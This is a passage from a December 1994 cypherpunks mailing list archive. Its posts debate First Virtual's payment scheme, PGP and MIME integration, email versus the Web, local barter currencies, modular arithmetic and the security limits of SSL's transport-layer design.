manageable level. Maybe people generating cover traffic could estimate how many messages they are generating. My remailer is a little unusual as the alumni.caltech.edu remailer always feeds into this one, so this may represent two remailers' worth of traffic. 
Hal From nsb at nsb.fv.com Thu Dec 15 08:18:02 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Thu, 15 Dec 94 08:18:02 PST Subject: FV fine print In-Reply-To: <24321.787507831.1@nsb.fv.com> Message-ID: Excerpts from fv: 15-Dec-94 FV fine print Eric Hughes at remailer.net (403) > * YOU shall retain computer data of all sales for at least > three years from the date of the transaction. In the event > you are not able to store such information, you may contact > infohaus-info at fv.com to make storage arrangements. > Interpretation is left to the reader. FYI, this is a direct carryover from the standard terms & conditions of a Visa/MasterCard merchant account. Basically, this is a legal necessity to process inquiries from the cardholder's issuing bank, etc. You'll note that we don't say you have to provide the information to us, merely that you have to keep it -- that way, if there's a court action requiring us to provide the information, we can point out that you are required to have the information. If you haven't kept it, you won't have nearly as much of a problem with us as with the government. In any event, the most we can do is say, "oh, you violated our terms and conditions, you can't be an FV seller any more." What we're doing here, in essence, is allowing ANYONE to function as a Visa/MC merchant, with the addition of the 90 day hold and a few other things. In order to do that, our terms and conditions have to ensure that you comply with the Visa/MC terms and conditions, that's all. -- Nathaniel From amanda at intercon.com Thu Dec 15 08:24:06 1994 From: amanda at intercon.com (Amanda Walker) Date: Thu, 15 Dec 94 08:24:06 PST Subject: Less Flaming, More Civility Message-ID: <199412151623.LAA23108@intercon.com> > C'punks, when this list started we were a bunch of idealistic privacy > freaks. Look who's on the list now: the developers of cutting edge Internet > software. The two are not necessarily mutually exclusive :). 
And from this point of view, I have to say that for all of my complaints about the specifics of various things Netscape has put forth, I cannot fault them for trying to improve the status quo. One thing that everyone has in common here is that we all believe that the issues we discuss are important, and that it's worth trying to solve the problems. This is in part, I think, why tempers flare from time to time--I know this was true in my case. Amanda Walker InterCon Systems Corporation From jdwilson at gold.chem.hawaii.edu Thu Dec 15 09:06:29 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Thu, 15 Dec 94 09:06:29 PST Subject: PGP 2.7 Message-ID: <199412151711.MAA03473@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- On Thu, 15 Dec 1994, DNA wrote: > I keep seeing pgp 2.7 in public key & sig blocks. > > Where do we get it? Viacrypt. It is the commercial version of 2.6.x - -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvB4nyoZzwIn1bdtAQFBKgF8Cpy4syrgzPe7Q4vQ7elW/7gvcK+3rfwJ byzKrS8TF7rwL1eLiVZfW+qolOyMB2TG =svxJ -----END PGP SIGNATURE----- From erc at khijol.xmission.com Thu Dec 15 09:08:13 1994 From: erc at khijol.xmission.com (Ed Carp [Sysadmin]) Date: Thu, 15 Dec 94 09:08:13 PST Subject: voice over SLIP? 
Message-ID: This might be somewhat off-topic, but could someone send me a list of ftp'able software for doing voice over SLIP? I'd prefer linux-based software, but DOS-based would work, too... Thanks very much! -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi ** PGP encrypted email preferred! ** "What's the use of distant travel if only to discover - you're homeless in your heart." --Basia, "Yearning" From eric at remailer.net Thu Dec 15 09:10:50 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 15 Dec 94 09:10:50 PST Subject: FV fine print In-Reply-To: Message-ID: <199412151808.KAA06618@largo.remailer.net> From: Nathaniel Borenstein FYI, this is a direct carryover from the standard terms & conditions of a Visa/MasterCard merchant account. Now that's what I thought it might be, and I'm not particularly surprised. If you use Visa, you have to play by Visa's rules. On cypherpunks, though, information lifetime is just one of those generally interesting questions. This information storage requirement is reminiscent of the Bank Secrecy Act of (I think) 1974. Is this clause from Visa/MC a direct (or indirect, even) result of that act, or is this just coincidence? This is banking arcanity, not crypto arcanity, and I'm not expecting an answer very hard. Eric From jdwilson at gold.chem.hawaii.edu Thu Dec 15 09:12:45 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Thu, 15 Dec 94 09:12:45 PST Subject: FV & PGP (was Re: First Virtual email security) Message-ID: <199412151717.MAA03516@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- On Thu, 15 Dec 1994 nsb at nsb.fv.com wrote: > Moreover, if we supported PGP today, we might indirectly lend > credibility to what we perceive as the incorrect belief that > cryptography is NECESSARY for commerce. 
Because we see cryptography as > helpful, but not necessary, we aren't going to support PGP right away, > but will probably add such support when a large enough portion of our > customer base wants it and can make use of it. Without cryptography how exactly are you going to protect my credit card numbers from sniffer-snoopers and crackers? Either you will send the credit card text in the clear, or it will be encrypted somehow. Or perhaps you will have customers call you over the phone to give you their credit card info? - -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvB6FCoZzwIn1bdtAQE9PAF/W2kx2n8l+Qz9Z/51MVQqjjPgGPdQRK8p WFPmh42CywQKiUjjg2qhqPrmzzz6V91r =6zTt -----END PGP SIGNATURE----- From meconlen at IntNet.net Thu Dec 15 09:41:18 1994 From: meconlen at IntNet.net (Michael Conlen) Date: Thu, 15 Dec 94 09:41:18 PST Subject: MIME (again) Message-ID: <199412151746.MAA03863@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- On Wed, 14 Dec 1994, L. McCarthy wrote: > I'm using a version of ELM which claims to be MIME-compliant and usually is, > but all I saw in Peter Cassidy's message was a collection of random-looking > extended-ASCII characters. Usually when something arrives in a locally- > unsupported MIME format (like Amanda's GIF a while back), I just get an > "unrecognized format" error message. 
I didn't see any error messages at all > this time, just a meaningless jumble of characters (different, incidentally, > from the PGP-cipherptext-like characters Tim quoted). That's what that thing was supposed to be. I got the same things with pine, which I know is supposed to be mime aware. Anyway all this talk about it gave me an idea. A PGP mime extension, where your mail says that you have a PGP encoded message, enter secret pass phrase to continue. I think this would do a couple of things. First, get PGP installed on more machines. Sys Admins who install MIME aware applications would almost be required to install PGP because it is a part of MIME. Second, more people would be introduced to PGP. The first time they use a MIME aware application, i.e. PINE, they would be given a message that they do not have a public/private key set up, etc. That time could be used to explain the basics of encryption, public/private keys, and security issues of using PGP. Third, PGP would be more frequently used because it would be right there with their E-Mail, etc. It would not require as much work to set up because the programs could prompt to do things ... Do you want to encrypt this E-Mail with the recipient's public key [Yn] ... Groove on dude Michael Conlen - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvCAzyoZzwIn1bdtAQFCnQGAi19XGrhhoUi7gaAJnG6UUeUjUqvX9yL+ m7qc768s3wEs5sdEqY2mT+JVCT1ES3PB =tQFE -----END PGP SIGNATURE----- From nsb at nsb.fv.com Thu Dec 15 09:45:57 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Thu, 15 Dec 94 09:45:57 PST Subject: FV & PGP (was Re: First Virtual email security) Message-ID: <199412151751.MAA03958@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Excerpts from fv: 15-Dec-94 Re: FV & PGP (was Re: First.. 
NetSurfer at gold.chem.hawa (1237*) > Without cryptography how exactly are you going to protect my credit card > numbers from sniffer-snoopers and crackers? Either you will send the > credit card text in the clear, or it will be encrypted somehow. Or perhaps > you will have customers call you over the phone to give you their credit > card info? We NEVER put your credit card number on the Internet. It is entered ONCE via telephone, and after that it is never needed directly -- people sell you things using your FV account-id, which does not have the same security properties as a credit card number. For more information, please send mail to info at fv.com or check out our web pages at http://www.fv.com. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvCB4CoZzwIn1bdtAQHLuAGAzvgG7jYAqpyHC/HD2NCmN3DkxnCeGT6J 3opxp30Uyo0T/5me04hlzvYe4A6IEDbA =yQOr -----END PGP SIGNATURE----- From samman at CS.YALE.EDU Thu Dec 15 09:55:55 1994 From: samman at CS.YALE.EDU (Ben) Date: Thu, 15 Dec 94 09:55:55 PST Subject: FV & PGP (was Re: First Virtual email security) In-Reply-To: <199412151717.MAA03516@bb.hks.net> Message-ID: On Thu, 15 Dec 1994, NetSurfer wrote: > Without cryptography how exactly are you going to protect my credit card > numbers from sniffer-snoopers and crackers? Either you will send the > credit card text in the clear, or it will be encrypted somehow. Or perhaps > you will have customers call you over the phone to give you their credit > card info? Like phone calls are really that secure what with people using cordless and cellular phones that still transmit in the clear even with Congress' best efforts to grant a false sense of security by outlawing some types of scanners. 
If you have to call, what would be the difference between this and normal mail order save that the catalog is digital? That's not a significant enough of a change to have it considered a new form of commerce. Ben. ---- "By the end of 1648 all was over. Cromwell was Dictator. The Royalists were crushed; Parliament was a tool; the Constitution was a figment; the Scots rebuffed, the Welsh back in their mountains; the Fleet was reorganised, London overawed. King Charles, at Carisbrooke Castle, where the donkey treads the water wheel, was left to pay the bill. It was mortal." --Winston Churchill --_History_of_English_Speaking_Peoples Vol. II From perry at imsi.com Thu Dec 15 10:03:00 1994 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 15 Dec 94 10:03:00 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412150210.SAA05624@netcom7.netcom.com> Message-ID: <9412151802.AA01210@snark.imsi.com> Timothy C. May says: > > Notice: MPEG-II Video Mail Attached: Quicktime 2.1-compatible. This > messages has been formatted as a HyperMIME document. Do not attempt to > read it on a non-HyperMIME-compliant system. You know Tim, I agree with you. This newfangled technology stuff is just too hard to deal with. Multimedia email is an obvious dead end. I'd suggest that we all move back to paper and pencil -- that's a simple common denominator that we all are capable of managing. In fact, we all ought to just gather about in our stone cave around the fire and chat about this in person -- it's friendlier that way. Perry Who still remembers telling people who thought that dealing with the NCP to TCP transition was too hard and is surprised to note that there are no more NCP hosts around. Who still remembers the terror in the eyes of floundering mainframe programmers realizing that they might have to learn something other than COBOL if they wanted to keep working for more than minimum wage. 
From A5713643665 at attpls.net Thu Dec 15 10:49:51 1994 From: A5713643665 at attpls.net (Tom Jones) Date: Thu, 15 Dec 94 10:49:51 PST Subject: Algebra Message-ID: <2B20CAE5> Dear Eric and Cypherpunks, So, how is division defined in Fp? Tom From kaseyu at acad.stedwards.edu Thu Dec 15 11:51:30 1994 From: kaseyu at acad.stedwards.edu ('Kasey Uthurusamy') Date: Thu, 15 Dec 94 11:51:30 PST Subject: 1984 shirt Message-ID: <9412151951.AA19625@toad.com> > > Hi, > > Do you know where I could order 2 XXL shirts? These are the ones that > say '1984 ....we're behind schedule'... > > Thanks! :) > > Kurgan > -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- _O_ "Ah...the KURGAN...he kurgan at gnu.ai.mit.edu \/\ /\/=<---- is the strongest of the punisher at ccwf.cc.utexas.edu * immortals...." kaseyu at acad.stedwards.edu / \ _/ |_ "INVICTUS MANEO" -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From tcmay at netcom.com Thu Dec 15 12:13:01 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 15 Dec 94 12:13:01 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <9412151802.AA01210@snark.imsi.com> Message-ID: <199412152012.MAA28503@netcom2.netcom.com> Perry E. Metzger wrote: > Timothy C. May says: > > > > Notice: MPEG-II Video Mail Attached: Quicktime 2.1-compatible. This > > messages has been formatted as a HyperMIME document. Do not attempt to > > read it on a non-HyperMIME-compliant system. > > You know Tim, I agree with you. This newfangled technology stuff is > just too hard to deal with. Multimedia email is an obvious dead > end. I'd suggest that we all move back to paper and pencil -- thats a > simple common denominator that we all are capable of managing. > > In fact, we all ought to just gather about in our stone cave around > the fire and chat about this in person -- its friendlier that way. I see two "stable attractors" for text/graphics/multimedia/etc. sent over the Net: 1. 
Straight text, ASCII, 80 column format. All systems can handle this, all mailers and newsreaders can handle it, it's what the Usenet is essentially based upon, and it gets the job done. It meets the needs of 95% of us for 95% of our needs. 2. The Web, for graphics, images, etc. This will be the next main stable attractor, deployed on many platforms. (I'm assuming the debate here about Netscape standards does not imply much of a fragmentation, that Mosaic, Netscape, MacWeb, etc., will all basically be able to display Web pages in much the same way.) I'm not arguing against technology, as Perry surely knows. I used FrameMaker 4.02 for my Monte Carlo paper, prettified with nice fonts and printed in 2-column format. I am willing to supply a "FrameViewer" version to this list, if there's enough interest. Other standards I have to deal with are Replica and Acrobat (my Smalltalk vendor likes these), Postscript versions, and the usual assortment of semi-proprietary standards for PhotoShop, Painter, MORE, and so on. The issue is not unwillingness to use new technology, it is, rather, the issue of "stable attractors." That is, what can I/we reasonably expect others to also have. Clearly if I issued my paper to the list in FrameMaker format, or Acrobat format, or even TeX format, only a few people would be able to read it. Fewer still would actually take the steps needed to actually display the paper. Standards, standards, standards! I don't think the minor extensions to e-mail (loosely called "MIME," though MIME serves other functions besides attaching graphics) are worth the effort, frankly. Most of the MIME messages (the ones that tell me about "ISO 558972 fonts" and "Press any key to return") don't seem to warrant the effort....I think in 90%+ of the cases people simply send messages as MIME by default, not because non-ASCII stuff is included. 
If we make the leap, I say make the leap to the Web: cave drawings --> text --> e-mail --> Web (By Web I of course mean the whole ball of wax involving HTML/HTTP/etc.) This is not a rejection of new technology, just a wise selection of which technology to bet on. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From claborne at microcosm.sandiegoca.NCR.COM Thu Dec 15 12:28:27 1994 From: claborne at microcosm.sandiegoca.NCR.COM (Claborne, Chris) Date: Thu, 15 Dec 94 12:28:27 PST Subject: E-Lets Message-ID: <2EF08EA8@microcosm.SanDiegoCA.NCR.COM> The following article has some unique ties to digital cash and what some people would like to see. In summary it is a description of bartering being used in Europe that removes money and replaces it with "Lets". Money no good? May I be the first to coin "E-Lets" :) ================================================================ >From "The European" 23-29 September 1994. Title: "Money no good? Try bartering" ... Additional reporting by Betrice Newbery. The Single Market was launched with the Single European Act of 1987, and with it the vision of a single European currency. But while governments seek a future of trading in ecus, people across the continent are looking to the past - to the days when bartering was the way of the world. Local Exchange Trading Systems (lets) are a form of moneyless trading, with more in common with 19th century anarchism than late 20th-century capitalism. 
The inhabitants of Stroud, a village in the west of England, can now pay for legal advice from a solicitor in "strouds" as well as sterling. In Madrid, masseurs and furniture removers accept both valle kas and pesetas. In Berlin, talents or deutschmarks are used to pay for babysitting or carpentry. Lets are proving remarkably popular. In Britain, there are more than 200 systems involving as many as 20,000 people. In Spain, the success of the Trueque Lets in Madrid has served as a model for similar systems to be created in Barcelona, Alicante and the Canary Islands. Switzerland has the Troc de Service in Onex and Denmark has a "Ring of Exchange". They could even spread to eastern Europe. A pilot scheme was started this summer in the city of Magdeburg in east Germany. "Because of high unemployment and limited capital, Lets could help people in the east to use their skills and talents," said Hugo Godscalk of Paysys, a German consultancy firm which specializes in forms of payment. Although the organization of each Lets is discreetly different they all share a basic tenet: that by tapping local skills and spending power, it is possible to improve the economic and psychological health of the community. They work by creating a local currency, the "bobbin" in Manchester, for example, and encouraging local people and business to accept that currency in payment, or part-payment, of goods and services. Joining a Lets is a quick and painless process. On payment of an initial, one-off registration fee (mainstream money), and a negligible annual administration fee (local money), you are issued with an account in the local currency, a cheque book and a local directory, which lists the goods and services available. You are then free, for example, to start paying for your gardener or buying your groceries in local currency. A small levy is charged on each transaction to cover the administration costs of the system and to pay the salary of the administrator. 
However, there are no interest charges when you go into debt and no restrictions on credit. While their simplicity makes them accessible, the growing popularity of alternative currencies has less to do with alternatives than the lack of them. Recession, unemployment and the high interest rates have left many people unable to earn, borrow, or spend conventional money. The Trueque (meaning barter) in Madrid was founded in January by Dan Wagman, an American who has been living in Spain for 16 years. "The present system of conventional money is not working too well," he says. "In Spain, 20 per cent of people are unemployed. It is a terrible waste of talent and time. Lets give the unemployed the chance to use their skills and the impoverished immediate access to services that they couldn't otherwise afford." Liz Shepard, who runs the national coordinating organization, Lets Link, in Britain, agrees: "One in six United Kingdom households were experiencing severe debt problems because of high interest rates and recession. An interest-free, non- profit-making system appeals to them." Christine Schoeb and Carlo Jelmini were both students in Geneva when they set up the Troc de Service in Onex as part of their course work. Another ten groups in Bern, Basel, Winterthur and elsewhere operate their own scheme based on talents. One of the founders, Simcha Piwnik, said: "We get professional workers advertising a whole range of services, from electricians to furniture restorers to kitchen-fitters. You can buy furniture, bicycles, organic vegetables - anything. It almost makes traditional street markets redundant." Yet the proliferation of Lets has not been problem-free. According to Michael Jacobs, an economist at Lancaster University and author of "Green Economy", Lets must overcome two main difficulties if they are to survive. "The first is common to all voluntary organisations: will enough people join and remain involved to make them work? 
The second is peculiar to Lets: is there a tendency for people to leave the local system once they secure employment within the mainstream economy? If so, they may well fail unless there is a continual supply of new members."

While survival can be difficult, growth can prove equally problematic. As they have become more widespread, Lets have attracted the attention of national treasuries who are concerned that local currencies could be exploited as a way of avoiding paying tax. Moreover, growth has prompted fears among Lets users that people could accumulate sizable debts and then leave the community without repaying.

In August, more than 60 people attended a conference near Montpellier in southern France to discuss ways of introducing Lets to that country. In Dessau, in Germany, a recent conference resulted in the setting up of six new systems. Henk van Arkel, from Utrecht, who runs a series of systems in the Netherlands, was one of the participants. "We are planning with the Irish, Flemish and German and probably the UK systems, for international co-operation across Europe," he said. "We do need more exchange of ideas and improvements. But we are not going to link the currencies. The most important part of the idea is the local aspect."

There are, however, signs that Lets are starting to encroach on some of the traditional functions of conventional money. Trading between groups, for example, is just beginning in some areas. But it will be a long time before they rival the ecu.

                                          ...  __o
                                         ..   -\<,
chris.claborne at sandiegoca.attgis.com    ...(*)/(*).
CI$: 76340.2422
PGP Pub Key fingerprint = A8 FA 55 92 23 20 72 69 52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server. PGP-encrypted e-mail welcome!

From jrochkin at cs.oberlin.edu Thu Dec 15 12:36:14 1994
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 15 Dec 94 12:36:14 PST
Subject: McCoy is Right! New Mail Format to Start Now.
Message-ID:

At 3:12 PM 12/15/94, Timothy C.
May wrote:
>If we make the leap, I say make the leap to the Web:
>
>cave drawings --> text --> e-mail --> Web
>
>(By Web I of course mean the whole ball of wax involving HTML/HTTP/etc.)
>
>This is not a rejection of new technology, just a wise selection of which technology to bet on.

HTTP and email serve different transport purposes. I don't think I really need to explain in what ways they are different, because we all know. Suffice it to say that mailing lists work better as a mailing list than it ever could as a web page, even with forms and all that stuff. A mailing list is a different transport-method choice than HTTP is.

But there's no reason why you couldn't mail html documents. html isn't a "transport" choice, but a "content" choice. Maybe in the future all of our mail readers will be able to render html, and people will send html mail, with anchors and ordered lists and whatever else. That's something I think is likely to happen, eventually.

Email and HTTP are transport mechanisms, whereas html and ascii text (which of course is a subset of html) are content formats. And MIME is a mechanism for describing what types of content formats are contained in the message, whether the message is a usenet article, a piece of email, or a web page. A given "transmission" of course can't be both email and HTTP, but it could be email and use MIME and be html. Or be http and mime and html.

I don't think we'll ever stop using email in favor of the web and HTTP, because they serve different purposes. I don't think Tim really does think we'll stop using email either, since I've heard him deprecate the web several times. He is just trying to convince us not to use MIME (or html for that matter) in email we send to the list, and thinks maybe this argument will convince us and not result in us calling him a technophobe. :)

From tcmay at netcom.com Thu Dec 15 12:37:30 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 15 Dec 94 12:37:30 PST
Subject: McCoy is Right!
New Mail Format to Start Now.
In-Reply-To: <199412152012.MAA28503@netcom2.netcom.com>
Message-ID: <199412152036.MAA01944@netcom2.netcom.com>

I want to add something to what I just sent out, something of direct relevance for PGP efforts:

> I see two "stable attractors" for text/graphics/multimedia/etc. sent over the Net:
>
> 1. Straight text, ASCII, 80 column format. All systems can handle this, all mailers and newsreaders can handle it, it's what the Usenet is essentially based upon, and it gets the job done. It meets the needs of 95% of us for 95% of our needs.
>
> 2. The Web, for graphics, images, etc. This will be the next main stable attractor, deployed on many platforms. (I'm assuming the debate here about Netscape standards does not imply much of a fragmentation, that Mosaic, Netscape, MacWeb, etc., will all basically be able to display Web pages in much the same way.)

And these two attractors are where the efforts on encryption have the biggest pay-offs.

We already know that PGP is "text"-oriented, and that PGP messages can be read on a variety of machines, from terminal to DOS to Macs to Suns, etc. PGP is well-suited to a straight text world, as it makes no assumptions about non-ASCII capabilities. (Using the ASCII-armor mode that most of us use.)

It is when assumptions are made by programs, think of "Lotus Notes" or "DECMail," that interoperability is lost.

The Lesson: Beware of making any assumptions about MIME sorts of extensions to use with PGP, as many people will--for whatever reasons--not be able or willing to process MIME mail.

The Web is where I think a lot of future efforts on integrating PGP in should happen. (I'm speaking of when the Web is used to send e-mail, which I hear is being worked on by many groups; clearly a lot of Netscape/Mosaic/etc. users expect to use these products as their main interface to the Net, and not have to have separate mail programs.)

This is where I would put my money.
--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com    | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From nsb at nsb.fv.com Thu Dec 15 12:38:30 1994
From: nsb at nsb.fv.com (Nathaniel Borenstein)
Date: Thu, 15 Dec 94 12:38:30 PST
Subject: properties of FV
In-Reply-To: <23696.787506983.1@nsb.fv.com>
Message-ID:

Excerpts from fv: 15-Dec-94 Re: properties of FV Eric Hughes at remailer.net (3987)

> I'm not trying to imply that you couldn't cobble something up fairly quickly, but I have my doubts that a good quick hack will scale appropriately for even a modest sized operation.

Assuming that thing that you're "cobbling together" is based on a reasonably robust database engine, it should scale a long, long way. Basically all you need is a set of three-part records: account-id, cumulative amount, and timestamp of oldest transaction. (You might want a fourth field that gives all the purchasing details as text, if your service sells a range of different kinds of things). Any good commercial db system should be able to handle a LOT of such records.

> > The very nature of such a net billing system requires linkability of transaction to transaction, or in other words generates identity. So FV is unsuitable for small value anonymous transactions.

> I would still like you to address this issue, if only to acknowledge the above characterization.

This goes back to the two kinds of anonymity that you so usefully defined in your earlier message.
These small transactions would have counterparty anonymity -- all that the seller knows is your first virtual id, which is essentially a user-chosen pseudonym -- but not issuer anonymity.

> As I had recalled from reading your materials, you were charging 29 cents plus 2% on one leg of the transaction plus an additional 2% on the other. Rereading, this is not the case. Am I remembering a previous situation?

No, you're just confused. Our charges have not changed, this is what they've always been. Probably our materials weren't clear enough somewhere, in which case I apologize.

> Partial security is better than no security.

That's a *very* interesting statement. I'm not at all sure what it means, so I'm not sure if I believe it or not. Sometimes partial security is worse than no security because it gives people a false *sense* of security. (People who know their email is going in the clear are likely to be more prudent than people who believe their email is "encrypted" even though the encryption algorithm might be a very poor one. I've even known people to pass real secrets around using rot13, amazingly enough. People can be quite naive.)

> One of the underlying conceptual problems with allowing a key to be at risk is some sort of belief that compromises of secret keys should never ever EVER be allowed to happen. This is ludicrous. When the benefit of the use of a private key means that it might be compromised, don't rely upon its not being compromised.

This is a very good point. It is one that is often missed in analyses of digital banks, in particular, where the consequences of compromising the bank's keys are often not sufficiently considered.

> In particular, if a digital signature does not, by agreement, carry an implied warranty of identity, then there's no problem at all. Use the crypto entirely for transit security.
> If someone hacks your machine and grabs your passphrase and forges a transaction, at least the intruder has to grab your passphrase.

This is exactly the way we would expect to use crypto layered on top of First Virtual's protocols, if and when such cryptographic protocols are deployed widely enough to have penetrated a meaningful portion of our market.

-- Nathaniel

From rishab at dxm.ernet.in Thu Dec 15 12:38:59 1994
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Thu, 15 Dec 94 12:38:59 PST
Subject: On criticizing SSL, and insecure transport layers
Message-ID:

kipp at mcom.com:
> Is [SSL] insecure? If so, how?
>
> Is there some cipher technology that it absolutely must support? If so, which one? why?

While I'm not going to say anything about SSL's qualities as a secure transport layer as such (I've not looked at it carefully enough) I think that the criticisms are on larger issues.

1. Standards - the reinventing the wheel criticism; if other methods for more or less the same thing exist (and swIPe source has been around for all to test to their hearts' content) why try a new one? This point seems to have mutated into general criticism of NCom's attitude to / knowledge of IETF proceedings and the technology

2. Security - the basic insecurity of _any_ transport layer. "If Netscape had to come up with a new secure protocol, why did they choose the transport layer?"

The transport layer is insecure because: it is less under the control of a user, it happens 'automagically'; it is at a lower level and so generally implemented by central authorities - sysadmins etc, and does not suit the web of trust model (nor does X.509) which is much better outside dictatorships; it is provided by the telco or net service provider who, as I suggested earlier, are prone to arm-twisting by the authorities, whether by legislation, or while 'cooperating'.
Transport layer security does not provide data authentication, it only provides server authentication; nor does it provide data security and privacy between users, it only provides network security.

To rebut Kipp's favourite justification, insecure transmission of passwords: transport layer security does _not_ improve password security/privacy, but only ensures that once a plaintext password is received by the transport layer, usually at a service provider, then it will not be intercepted. Secure transmission of passwords could (but as far as I know is not widely) be implemented at the client level, through DH handshaking or something, which would ensure a completely secure and _private_ transaction.

Transport layer security is nice because it is conveniently automatic and transparent, but it can lead to a false sense of security for precisely that reason.

Of course these are quintessentially Cypherpunk objections. A bank, or Singapore, would be quite comfortable with such a system for internal networks.

"We know everything about you that we need to know" - Coleta Brueck, IRS
-----------------------------------------------------------------------------
Rishab Aiyer Ghosh              "In between the breaths is
rishab at dxm.ernet.in            the space where we live"
rishab at arbornet.org                - Lawrence Durrell
Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335
H 34C Saket, New Delhi 110017, INDIA

From perry at imsi.com Thu Dec 15 12:39:21 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Thu, 15 Dec 94 12:39:21 PST
Subject: Algebra
In-Reply-To: <2B20CAE5>
Message-ID: <9412152037.AA01349@snark.imsi.com>

Tom Jones says:
> Dear Eric and Cypherpunks,
>
> So, how is division defined in Fp?

Being an old fogey, I still refer to the field formed by the integers modulo a prime by a gothic capital Z sub p.

In Z_p, you define division as the inverse of multiplication, just as in real life. One easy way to do this is to note that every number in a field like this has a multiplicative inverse.
Multiplying by the multiplicative inverse of a number is the same as dividing by the number.

For the hell of it, make yourself a multiplication table for Z_5. It's a quick exercise. Note that every number in Z_5 other than zero possesses a multiplicative inverse -- that is, a number that it can be multiplied against to yield 1. Step back and then observe, experimentally, that for any three positive numbers in Z_5 A, B and C such that A*B=C, that C*(B^-1)=A. One can, of course, prove that this is the case rigorously...

Perry

From snyderra at dunx1.ocs.drexel.edu Thu Dec 15 12:45:30 1994
From: snyderra at dunx1.ocs.drexel.edu (Bob Snyder)
Date: Thu, 15 Dec 94 12:45:30 PST
Subject: MIME (again)
In-Reply-To: <199412151746.MAA03863@bb.hks.net>
Message-ID: <199412152043.PAA26851@dunx1.ocs.drexel.edu>

-----BEGIN PGP SIGNED MESSAGE-----

Michael Conlen scribbles:
> That's what that thing was supposed to be. I got the same things with pine, which I know is supposed to be mime aware. Anyway all this talk about it gave me an idea. A PGP mime extension, where your mail says that you have a PGP encoded message, enter secret pass phrase to continue. I think this would do a couple of things

This is out in draft form.

> First get PGP installed on more machines. Sys Admins who install MIME aware applications would almost be required to install PGP because it is a part of MIME.

Just like they are almost required to install MS Word because of the existence of application/ms-word? Speaking as a SysAdmin, if it were a limited use item, where only a few people wanted it, I would show the users how to set up their own MIME handling, like metamail's .mailcap file.

> Second, more people would be introduced to PGP. The first time they use a MIME aware application ie. PINE they would be given a message that they do not have a public/private key set up, etc. That time could be used to explain the basics of encryption, public/private keys, and security issues of using PGP.
Only if the user chose to send things in application/pgp (or is it text/pgp?) If they chose to send text/plain, they'd never have to deal with PGP.

Forcing PGP down people's throats is not a way of winning "converts." You need to convince them of the need, then present well-integrated tools that make it simple. If you try to force people to use PGP, they'll find work-arounds and do what they can to avoid it.

Bob

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

